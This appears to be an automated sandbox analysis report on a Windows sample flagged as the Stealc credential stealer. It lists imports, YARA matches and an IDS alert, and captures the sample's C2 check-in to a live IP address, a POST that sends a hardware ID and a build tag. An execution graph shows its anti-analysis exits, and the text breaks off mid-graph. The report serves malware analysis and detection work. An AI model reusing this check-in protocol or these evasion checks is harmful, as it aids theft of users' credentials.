                                        RT_GROUP_CURSOR0x7d9a00x30data0.9375
                                        RT_GROUP_ICON0x6ca580x68dataTamilIndia0.7019230769230769
                                        RT_GROUP_ICON0x6ca580x68dataTamilSri Lanka0.7019230769230769
                                        RT_GROUP_ICON0x668f80x68dataTamilIndia0.6826923076923077
                                        RT_GROUP_ICON0x668f80x68dataTamilSri Lanka0.6826923076923077
                                        RT_GROUP_ICON0x732800x76dataTamilIndia0.6779661016949152
                                        RT_GROUP_ICON0x732800x76dataTamilSri Lanka0.6779661016949152
                                        RT_GROUP_ICON0x79ab80x76dataTamilIndia0.6779661016949152
                                        RT_GROUP_ICON0x79ab80x76dataTamilSri Lanka0.6779661016949152
                                        RT_VERSION0x7d9d00x258data0.5416666666666666
                                        DLLImport
                                        KERNEL32.dllGlobalCompact, CommConfigDialogA, InterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetConsoleAliasExesA, GetShortPathNameA, CreateJobObjectA, LCMapStringA, VerifyVersionInfoW, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, GetLocaleInfoA, SetFilePointer, GetEnvironmentVariableA, EnumCalendarInfoA, WriteConsoleW, CloseHandle, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CreateFileW
                                        GDI32.dllCreateDCW, GetCharWidth32A, GetCharWidthI
                                        WINHTTP.dllWinHttpOpen
                                        Language of compilation systemCountry where language is spokenMap
                                        TamilIndia
                                        TamilSri Lanka
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-07T19:32:03.717476+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.204.41.15080TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 19:32:02.497452974 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:02.502999067 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:02.503247023 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:02.503453970 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:02.508924007 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:03.187881947 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:03.187983036 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:03.201674938 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:03.207804918 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:03.717360020 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:03.717475891 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:08.720690012 CEST804970462.204.41.150192.168.2.5
                                        Oct 7, 2024 19:32:08.721085072 CEST4970480192.168.2.562.204.41.150
                                        Oct 7, 2024 19:32:22.294926882 CEST4970480192.168.2.562.204.41.150
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 19:33:08.334244013 CEST53543161.1.1.1192.168.2.5
                                        • 62.204.41.150
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.54970462.204.41.150801968C:\Users\user\Desktop\RJQySowVRb.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 19:32:02.503453970 CEST88OUTGET / HTTP/1.1
                                        Host: 62.204.41.150
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Oct 7, 2024 19:32:03.187881947 CEST203INHTTP/1.1 200 OK
                                        Date: Mon, 07 Oct 2024 17:32:03 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Oct 7, 2024 19:32:03.201674938 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                        Host: 62.204.41.150
                                        Content-Length: 219
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 33 35 33 32 43 32 31 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a
                                        Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="hwid"3763532C21933158821099------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build"default6_cap------GIEBFHCAKFBGDHIDHIDB--
                                        Oct 7, 2024 19:32:03.717360020 CEST210INHTTP/1.1 200 OK
                                        Date: Mon, 07 Oct 2024 17:32:03 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 8
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                        Data Ascii: YmxvY2s=


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:13:32:00
                                        Start date:07/10/2024
                                        Path:C:\Users\user\Desktop\RJQySowVRb.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\RJQySowVRb.exe"
                                        Imagebase:0x400000
                                        File size:454'144 bytes
                                        MD5 hash:A4BB6E4D88C94F0389873B241E6EEE8E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2034048074.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:13:32:03
                                        Start date:07/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1228
                                        Imagebase:0x790000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:7.2%
                                          Dynamic/Decrypted Code Coverage:6.8%
                                          Signature Coverage:12.7%
                                          Total number of Nodes:1428
                                          Total number of Limit Nodes:27
                                          execution_graph 27645 409440 strlen malloc strcpy_s free std::exception::exception 27683 22d932a ??2@YAPAXI RaiseException allocator 27703 41ce48 LeaveCriticalSection type_info::_Type_info_dtor 27745 22e1525 strtok_s strtok_s lstrlen lstrcpy ctype 27647 41b050 6 API calls 3 library calls 27686 22d9b37 9 API calls 27707 22e1c35 110 API calls 27747 406f60 memcpy 27649 41dc60 atexit 27650 22e6a0a ExitProcess 27749 410765 279 API calls 27708 417667 lstrcpy 27603 22d0005 27608 22d092b GetPEB 27603->27608 27605 22d0030 27609 22d003c 27605->27609 27608->27605 27610 22d0049 27609->27610 27624 22d0e0f SetErrorMode SetErrorMode 27610->27624 27615 22d0265 27616 22d02ce VirtualProtect 27615->27616 27618 22d030b 27616->27618 27617 22d0439 VirtualFree 27621 22d04be 27617->27621 27622 22d05f4 LoadLibraryA 27617->27622 27618->27617 27619 22d04e3 LoadLibraryA 27619->27621 27621->27619 27621->27622 27623 22d08c7 27622->27623 27625 22d0223 27624->27625 27626 22d0d90 27625->27626 27627 22d0dad 27626->27627 27628 22d0dbb GetPEB 27627->27628 27629 22d0238 VirtualAlloc 27627->27629 27628->27629 27629->27615 27751 22ed106 41 API calls __amsg_exit 27709 41b270 5 API calls 2 library calls 27654 22e15b3 18 API calls ctype 27753 22df567 56 API calls 27754 22dfd67 152 API calls 27655 41bc11 71 API calls 2 library calls 27656 22ebe78 162 API calls 2 library calls 27657 22ecd97 170 API calls 2 library calls 27658 22e3b7d 91 API calls 2 library calls 27659 41ac2c 71 API calls ctype 27660 22e6a40 6 API calls 27757 22e6d18 643 API calls 27715 22e102b strtok_s lstrlen lstrcpy 27716 22e6c57 689 API calls 27717 22e140b strtok_s 27661 22e32ae 22 API calls 27719 22ed0af RtlLeaveCriticalSection __initptd 27662 4090c3 5 API calls allocator 27720 22e140b StrCmpCA strtok_s 27759 22ecd90 173 API calls 3 library calls 27664 22d6ebc VirtualProtect 27760 41abd0 free std::exception::_Tidy ctype 27722 22e0cb6 30 API calls 27723 22e04b7 88 API calls 27762 413916 91 API calls 2 library calls 27763 4183dc 15 API calls 27724 22e102b StrCmpCA strtok_s lstrlen lstrcpy 27764 22ecd8f 6 API calls 2 library calls 27765 22e118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27668 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27726 41ceea SetUnhandledExceptionFilter 27727 22e3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26182 4169f0 26225 402260 26182->26225 26199 417850 3 API calls 26200 416a30 26199->26200 26201 4178e0 3 API calls 26200->26201 26202 416a43 26201->26202 26358 41a9b0 26202->26358 26204 416a64 26205 41a9b0 4 API calls 26204->26205 26206 416a6b 26205->26206 26207 41a9b0 4 API calls 26206->26207 26208 416a72 26207->26208 26209 41a9b0 4 API calls 26208->26209 26210 416a79 26209->26210 26211 41a9b0 4 API calls 26210->26211 26212 416a80 26211->26212 26366 41a8a0 26212->26366 26214 416b0c 26370 416920 GetSystemTime 26214->26370 26216 416a89 26216->26214 26218 416ac2 OpenEventA 26216->26218 26220 416af5 CloseHandle Sleep 26218->26220 26221 416ad9 26218->26221 26222 416b0a 26220->26222 26224 416ae1 CreateEventA 26221->26224 26222->26216 26223 416b16 CloseHandle ExitProcess 26224->26214 26567 4045c0 17 API calls 26225->26567 26227 402274 26228 4045c0 34 API calls 26227->26228 26229 40228d 26228->26229 26230 4045c0 34 API calls 26229->26230 26231 4022a6 26230->26231 26232 4045c0 34 API calls 26231->26232 26233 4022bf 26232->26233 26234 4045c0 34 API calls 26233->26234 26235 4022d8 26234->26235 26236 4045c0 34 API calls 26235->26236 26237 4022f1 26236->26237 26238 4045c0 34 API calls 26237->26238 26239 40230a 26238->26239 26240 4045c0 34 API calls 26239->26240 26241 402323 26240->26241 26242 4045c0 34 API calls 26241->26242 26243 40233c 26242->26243 26244 4045c0 34 API calls 26243->26244 26245 402355 26244->26245 26246 4045c0 34 API calls 26245->26246 26247 40236e 26246->26247 26248 4045c0 34 API calls 26247->26248 26249 402387 26248->26249 26250 4045c0 34 API calls 26249->26250 26251 4023a0 26250->26251 26252 4045c0 34 API calls 26251->26252 26253 4023b9 26252->26253 26254 4045c0 34 API calls 26253->26254 26255 4023d2 26254->26255 26256 4045c0 34 API calls 26255->26256 26257 4023eb 26256->26257 26258 4045c0 34 API calls 26257->26258 26259 402404 26258->26259 26260 4045c0 34 API calls 26259->26260 26261 40241d 26260->26261 26262 4045c0 34 API calls 26261->26262 26263 402436 26262->26263 26264 4045c0 34 API calls 26263->26264 26265 40244f 26264->26265 26266 4045c0 34 API calls 26265->26266 26267 402468 26266->26267 26268 4045c0 34 API calls 26267->26268 26269 402481 26268->26269 26270 4045c0 34 API calls 26269->26270 26271 40249a 26270->26271 26272 4045c0 34 API calls 26271->26272 26273 4024b3 26272->26273 26274 4045c0 34 API calls 26273->26274 26275 4024cc 26274->26275 26276 4045c0 34 API calls 26275->26276 26277 4024e5 26276->26277 26278 4045c0 34 API calls 26277->26278 26279 4024fe 26278->26279 26280 4045c0 34 API calls 26279->26280 26281 402517 26280->26281 26282 4045c0 34 API calls 26281->26282 26283 402530 26282->26283 26284 4045c0 34 API calls 26283->26284 26285 402549 26284->26285 26286 4045c0 34 API calls 26285->26286 26287 402562 26286->26287 26288 4045c0 34 API calls 26287->26288 26289 40257b 26288->26289 26290 4045c0 34 API calls 26289->26290 26291 402594 26290->26291 26292 4045c0 34 API calls 26291->26292 26293 4025ad 26292->26293 26294 4045c0 34 API calls 26293->26294 26295 4025c6 26294->26295 26296 4045c0 34 API calls 26295->26296 26297 4025df 26296->26297 26298 4045c0 34 API calls 26297->26298 26299 4025f8 26298->26299 26300 4045c0 34 API calls 26299->26300 26301 402611 26300->26301 26302 4045c0 34 API calls 26301->26302 26303 40262a 26302->26303 26304 4045c0 34 API calls 26303->26304 26305 402643 26304->26305 26306 4045c0 34 API calls 26305->26306 26307 40265c 26306->26307 26308 4045c0 34 API calls 26307->26308 26309 402675 26308->26309 26310 4045c0 34 API calls 26309->26310 26311 40268e 26310->26311 26312 419860 26311->26312 26571 419750 GetPEB 26312->26571 26314 419868 26315 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26314->26315 26316 41987a 26314->26316 26317 419af4 GetProcAddress 26315->26317 26318 419b0d 26315->26318 26319 41988c 21 API calls 26316->26319 26317->26318 26320 419b46 26318->26320 26321 419b16 GetProcAddress GetProcAddress 26318->26321 26319->26315 26322 419b68 26320->26322 26323 419b4f GetProcAddress 26320->26323 26321->26320 26324 419b71 GetProcAddress 26322->26324 26325 419b89 26322->26325 26323->26322 26324->26325 26326 416a00 26325->26326 26327 419b92 GetProcAddress GetProcAddress 26325->26327 26328 41a740 26326->26328 26327->26326 26329 41a750 26328->26329 26330 416a0d 26329->26330 26331 41a77e lstrcpy 26329->26331 26332 4011d0 26330->26332 26331->26330 26333 4011e8 26332->26333 26334 401217 26333->26334 26335 40120f ExitProcess 26333->26335 26336 401160 GetSystemInfo 26334->26336 26337 401184 26336->26337 26338 40117c ExitProcess 26336->26338 26339 401110 GetCurrentProcess VirtualAllocExNuma 26337->26339 26340 401141 ExitProcess 26339->26340 26341 401149 26339->26341 26572 4010a0 VirtualAlloc 26341->26572 26344 401220 26576 4189b0 26344->26576 26347 401249 __aulldiv 26348 40129a 26347->26348 26349 401292 ExitProcess 26347->26349 26350 416770 GetUserDefaultLangID 26348->26350 26351 4167d3 GetUserDefaultLCID 26350->26351 26352 416792 26350->26352 26351->26199 26352->26351 26353 4167c1 ExitProcess 26352->26353 26354 4167a3 ExitProcess 26352->26354 26355 4167b7 ExitProcess 26352->26355 26356 4167cb ExitProcess 26352->26356 26357 4167ad ExitProcess 26352->26357 26578 41a710 26358->26578 26360 41a9c1 lstrlenA 26361 41a9e0 26360->26361 26362 41aa18 26361->26362 26364 41a9fa lstrcpy lstrcatA 26361->26364 26579 41a7a0 26362->26579 26364->26362 26365 41aa24 26365->26204 26367 41a8bb 26366->26367 26368 41a90b 26367->26368 26369 41a8f9 lstrcpy 26367->26369 26368->26216 26369->26368 26583 416820 26370->26583 26372 41698e 26373 416998 sscanf 26372->26373 26612 41a800 26373->26612 26375 4169aa SystemTimeToFileTime SystemTimeToFileTime 26376 4169e0 26375->26376 26377 4169ce 26375->26377 26379 415b10 26376->26379 26377->26376 26378 4169d8 ExitProcess 26377->26378 26380 415b1d 26379->26380 26381 41a740 lstrcpy 26380->26381 26382 415b2e 26381->26382 26614 41a820 lstrlenA 26382->26614 26385 41a820 2 API calls 26386 415b64 26385->26386 26387 41a820 2 API calls 26386->26387 26388 415b74 26387->26388 26618 416430 26388->26618 26391 41a820 2 API calls 26392 415b93 26391->26392 26393 41a820 2 API calls 26392->26393 26394 415ba0 26393->26394 26395 41a820 2 API calls 26394->26395 26396 415bad 26395->26396 26397 41a820 2 API calls 26396->26397 26398 415bf9 26397->26398 26627 4026a0 26398->26627 26406 415cc3 26407 416430 lstrcpy 26406->26407 26408 415cd5 26407->26408 26409 41a7a0 lstrcpy 26408->26409 26410 415cf2 26409->26410 26411 41a9b0 4 API calls 26410->26411 26412 415d0a 26411->26412 26413 41a8a0 lstrcpy 26412->26413 26414 415d16 26413->26414 26415 41a9b0 4 API calls 26414->26415 26416 415d3a 26415->26416 26417 41a8a0 lstrcpy 26416->26417 26418 415d46 26417->26418 26419 41a9b0 4 API calls 26418->26419 26420 415d6a 26419->26420 26421 41a8a0 lstrcpy 26420->26421 26422 415d76 26421->26422 26423 41a740 lstrcpy 26422->26423 26424 415d9e 26423->26424 27353 417500 GetWindowsDirectoryA 26424->27353 26427 41a7a0 lstrcpy 26428 415db8 26427->26428 27363 404880 26428->27363 26430 415dbe 27508 4117a0 26430->27508 26432 415dc6 26433 41a740 lstrcpy 26432->26433 26434 415de9 26433->26434 26435 401590 lstrcpy 26434->26435 26436 415dfd 26435->26436 27528 405960 39 API calls ctype 26436->27528 26438 415e03 27529 411050 strtok_s strtok_s lstrlenA lstrcpy 26438->27529 26440 415e0e 26441 41a740 lstrcpy 26440->26441 26442 415e32 26441->26442 26443 401590 lstrcpy 26442->26443 26444 415e46 26443->26444 27530 405960 39 API calls ctype 26444->27530 26446 415e4c 27531 410d90 7 API calls 26446->27531 26448 415e57 26449 41a740 lstrcpy 26448->26449 26450 415e79 26449->26450 26451 401590 lstrcpy 26450->26451 26452 415e8d 26451->26452 27532 405960 39 API calls ctype 26452->27532 26454 415e93 27533 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26454->27533 26456 415e9e 26457 401590 lstrcpy 26456->26457 26458 415eb5 26457->26458 27534 411a10 121 API calls 26458->27534 26460 415eba 26461 41a740 lstrcpy 26460->26461 26462 415ed6 26461->26462 27535 404fb0 8 API calls 26462->27535 26464 415edb 26465 401590 lstrcpy 26464->26465 26466 415f5b 26465->26466 27536 410740 292 API calls 26466->27536 26468 415f60 26469 41a740 lstrcpy 26468->26469 26470 415f86 26469->26470 26471 401590 lstrcpy 26470->26471 26472 415f9a 26471->26472 27537 405960 39 API calls ctype 26472->27537 26474 415fa0 27538 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26474->27538 26476 415fab 26477 401590 lstrcpy 26476->26477 26478 415feb 26477->26478 27539 401e80 67 API calls 26478->27539 26480 415ff0 26481 416000 26480->26481 26482 416092 26480->26482 26483 41a740 lstrcpy 26481->26483 26484 41a7a0 lstrcpy 26482->26484 26485 416020 26483->26485 26486 4160a5 26484->26486 26487 401590 lstrcpy 26485->26487 26488 401590 lstrcpy 26486->26488 26490 416034 26487->26490 26489 4160b9 26488->26489 27543 405960 39 API calls ctype 26489->27543 27540 405960 39 API calls ctype 26490->27540 26493 4160bf 27544 413560 36 API calls 26493->27544 26494 41603a 27541 4112d0 21 API calls ctype 26494->27541 26497 41608a 26500 41610b 26497->26500 26503 401590 lstrcpy 26497->26503 26498 416045 26499 401590 lstrcpy 26498->26499 26501 416085 26499->26501 26502 416130 26500->26502 26505 401590 lstrcpy 26500->26505 27542 413dc0 75 API calls 26501->27542 26506 416155 26502->26506 26509 401590 lstrcpy 26502->26509 26507 4160e7 26503->26507 26508 41612b 26505->26508 26511 41617a 26506->26511 26516 401590 lstrcpy 26506->26516 27545 4140b0 64 API calls ctype 26507->27545 27547 414780 116 API calls ctype 26508->27547 26514 416150 26509->26514 26512 41619f 26511->26512 26517 401590 lstrcpy 26511->26517 26518 4161c4 26512->26518 26523 401590 lstrcpy 26512->26523 27548 414bb0 67 API calls ctype 26514->27548 26515 4160ec 26520 401590 lstrcpy 26515->26520 26521 416175 26516->26521 26522 41619a 26517->26522 26525 4161e9 26518->26525 26531 401590 lstrcpy 26518->26531 26524 416106 26520->26524 27549 414d70 75 API calls 26521->27549 27550 414f40 69 API calls ctype 26522->27550 26529 4161bf 26523->26529 27546 415100 71 API calls 26524->27546 26527 416210 26525->26527 26533 401590 lstrcpy 26525->26533 26534 416220 26527->26534 26535 4162b3 26527->26535 27551 407710 125 API calls ctype 26529->27551 26532 4161e4 26531->26532 27552 415050 67 API calls ctype 26532->27552 26538 416209 26533->26538 26540 41a740 lstrcpy 26534->26540 26539 41a7a0 lstrcpy 26535->26539 27553 419010 54 API calls ctype 26538->27553 26542 4162c6 26539->26542 26543 416241 26540->26543 26544 401590 lstrcpy 26542->26544 26545 401590 lstrcpy 26543->26545 26546 4162da 26544->26546 26547 416255 26545->26547 27557 405960 39 API calls ctype 26546->27557 27554 405960 39 API calls ctype 26547->27554 26550 41625b 27555 4112d0 21 API calls ctype 26550->27555 26551 4162e0 27558 413560 36 API calls 26551->27558 26554 416266 26556 401590 lstrcpy 26554->26556 26555 4162ab 26557 41a7a0 lstrcpy 26555->26557 26558 4162a6 26556->26558 26559 4162fc 26557->26559 27556 413dc0 75 API calls 26558->27556 26561 401590 lstrcpy 26559->26561 26562 416310 26561->26562 27559 405960 39 API calls ctype 26562->27559 26564 41631c 26566 416338 26564->26566 27560 416630 9 API calls ctype 26564->27560 26566->26223 26568 404697 26567->26568 26569 4046ac 11 API calls 26568->26569 26570 40474f 6 API calls 26568->26570 26569->26568 26570->26227 26571->26314 26574 4010c2 ctype 26572->26574 26573 4010fd 26573->26344 26574->26573 26575 4010e2 VirtualFree 26574->26575 26575->26573 26577 401233 GlobalMemoryStatusEx 26576->26577 26577->26347 26578->26360 26580 41a7c2 26579->26580 26581 41a7ec 26580->26581 26582 41a7da lstrcpy 26580->26582 26581->26365 26582->26581 26584 41a740 lstrcpy 26583->26584 26585 416833 26584->26585 26586 41a9b0 4 API calls 26585->26586 26587 416845 26586->26587 26588 41a8a0 lstrcpy 26587->26588 26589 41684e 26588->26589 26590 41a9b0 4 API calls 26589->26590 26591 416867 26590->26591 26592 41a8a0 lstrcpy 26591->26592 26593 416870 26592->26593 26594 41a9b0 4 API calls 26593->26594 26595 41688a 26594->26595 26596 41a8a0 lstrcpy 26595->26596 26597 416893 26596->26597 26598 41a9b0 4 API calls 26597->26598 26599 4168ac 26598->26599 26600 41a8a0 lstrcpy 26599->26600 26601 4168b5 26600->26601 26602 41a9b0 4 API calls 26601->26602 26603 4168cf 26602->26603 26604 41a8a0 lstrcpy 26603->26604 26605 4168d8 26604->26605 26606 41a9b0 4 API calls 26605->26606 26607 4168f3 26606->26607 26608 41a8a0 lstrcpy 26607->26608 26609 4168fc 26608->26609 26610 41a7a0 lstrcpy 26609->26610 26611 416910 26610->26611 26611->26372 26613 41a812 26612->26613 26613->26375 26615 41a83f 26614->26615 26616 415b54 26615->26616 26617 41a87b lstrcpy 26615->26617 26616->26385 26617->26616 26619 41a8a0 lstrcpy 26618->26619 26620 416443 26619->26620 26621 41a8a0 lstrcpy 26620->26621 26622 416455 26621->26622 26623 41a8a0 lstrcpy 26622->26623 26624 416467 26623->26624 26625 41a8a0 lstrcpy 26624->26625 26626 415b86 26625->26626 26626->26391 26628 4045c0 34 API calls 26627->26628 26629 4026b4 26628->26629 26630 4045c0 34 API calls 26629->26630 26631 4026d7 26630->26631 26632 4045c0 34 API calls 26631->26632 26633 4026f0 26632->26633 26634 4045c0 34 API calls 26633->26634 26635 402709 26634->26635 26636 4045c0 34 API calls 26635->26636 26637 402736 26636->26637 26638 4045c0 34 API calls 26637->26638 26639 40274f 26638->26639 26640 4045c0 34 API calls 26639->26640 26641 402768 26640->26641 26642 4045c0 34 API calls 26641->26642 26643 402795 26642->26643 26644 4045c0 34 API calls 26643->26644 26645 4027ae 26644->26645 26646 4045c0 34 API calls 26645->26646 26647 4027c7 26646->26647 26648 4045c0 34 API calls 26647->26648 26649 4027e0 26648->26649 26650 4045c0 34 API calls 26649->26650 26651 4027f9 26650->26651 26652 4045c0 34 API calls 26651->26652 26653 402812 26652->26653 26654 4045c0 34 API calls 26653->26654 26655 40282b 26654->26655 26656 4045c0 34 API calls 26655->26656 26657 402844 26656->26657 26658 4045c0 34 API calls 26657->26658 26659 40285d 26658->26659 26660 4045c0 34 API calls 26659->26660 26661 402876 26660->26661 26662 4045c0 34 API calls 26661->26662 26663 40288f 26662->26663 26664 4045c0 34 API calls 26663->26664 26665 4028a8 26664->26665 26666 4045c0 34 API calls 26665->26666 26667 4028c1 26666->26667 26668 4045c0 34 API calls 26667->26668 26669 4028da 26668->26669 26670 4045c0 34 API calls 26669->26670 26671 4028f3 26670->26671 26672 4045c0 34 API calls 26671->26672 26673 40290c 26672->26673 26674 4045c0 34 API calls 26673->26674 26675 402925 26674->26675 26676 4045c0 34 API calls 26675->26676 26677 40293e 26676->26677 26678 4045c0 34 API calls 26677->26678 26679 402957 26678->26679 26680 4045c0 34 API calls 26679->26680 26681 402970 26680->26681 26682 4045c0 34 API calls 26681->26682 26683 402989 26682->26683 26684 4045c0 34 API calls 26683->26684 26685 4029a2 26684->26685 26686 4045c0 34 API calls 26685->26686 26687 4029bb 26686->26687 26688 4045c0 34 API calls 26687->26688 26689 4029d4 26688->26689 26690 4045c0 34 API calls 26689->26690 26691 4029ed 26690->26691 26692 4045c0 34 API calls 26691->26692 26693 402a06 26692->26693 26694 4045c0 34 API calls 26693->26694 26695 402a1f 26694->26695 26696 4045c0 34 API calls 26695->26696 26697 402a38 26696->26697 26698 4045c0 34 API calls 26697->26698 26699 402a51 26698->26699 26700 4045c0 34 API calls 26699->26700 26701 402a6a 26700->26701 26702 4045c0 34 API calls 26701->26702 26703 402a83 26702->26703 26704 4045c0 34 API calls 26703->26704 26705 402a9c 26704->26705 26706 4045c0 34 API calls 26705->26706 26707 402ab5 26706->26707 26708 4045c0 34 API calls 26707->26708 26709 402ace 26708->26709 26710 4045c0 34 API calls 26709->26710 26711 402ae7 26710->26711 26712 4045c0 34 API calls 26711->26712 26713 402b00 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 402b19 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 402b32 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402b4b 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402b64 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 402b7d 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 402b96 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 402baf 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 402bc8 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 402be1 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 402bfa 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 402c13 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402c2c 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 402c45 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402c5e 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 402c77 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402c90 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 402ca9 26746->26747 26748 